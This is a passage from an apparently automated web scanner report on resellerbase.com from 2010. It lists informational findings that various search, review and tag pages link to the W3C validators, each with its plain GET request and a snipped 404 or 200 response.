Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.284. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /resources-information/ebooks/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.285. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/review/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /resources-information/ebooks/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.286. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /resources-information/ebooks/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.287. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /resources-information/ebooks/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.288. http://www.resellerbase.com/resources-information/ebooks/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/resources-information/ebooks/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /resources-information/ebooks/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.289. http://www.resellerbase.com/resources-information/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/resources-information/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /resources-information/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.290. http://www.resellerbase.com/resources-information/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/resources-information/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /resources-information/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.291. http://www.resellerbase.com/resources-information/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/resources-information/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /resources-information/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.292. http://www.resellerbase.com/resources-information/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/resources-information/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /resources-information/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.293. http://www.resellerbase.com/review.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/review.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/review.php?id=24

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /review.php?id=24 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8229

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Suspended Resource</
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.294. http://www.resellerbase.com/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8163

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search result: searc
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.295. http://www.resellerbase.com/sendmail.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/sendmail.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/sendmail.php?lid=11

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /sendmail.php?lid=11 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:06:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Send Email</title>
<
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.296. http://www.resellerbase.com/tag/googlepr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/googlepr.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/tag/googlepr.php?link_id=6

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /tag/googlepr.php?link_id=6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:52:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9714

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: googl
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.297. http://www.resellerbase.com/tag/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/tag/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /tag/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/dropshipper
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: searc
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.298. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /tag/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.299. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /tag/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.300. http://www.resellerbase.com/tag/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/tag/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /tag/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9752

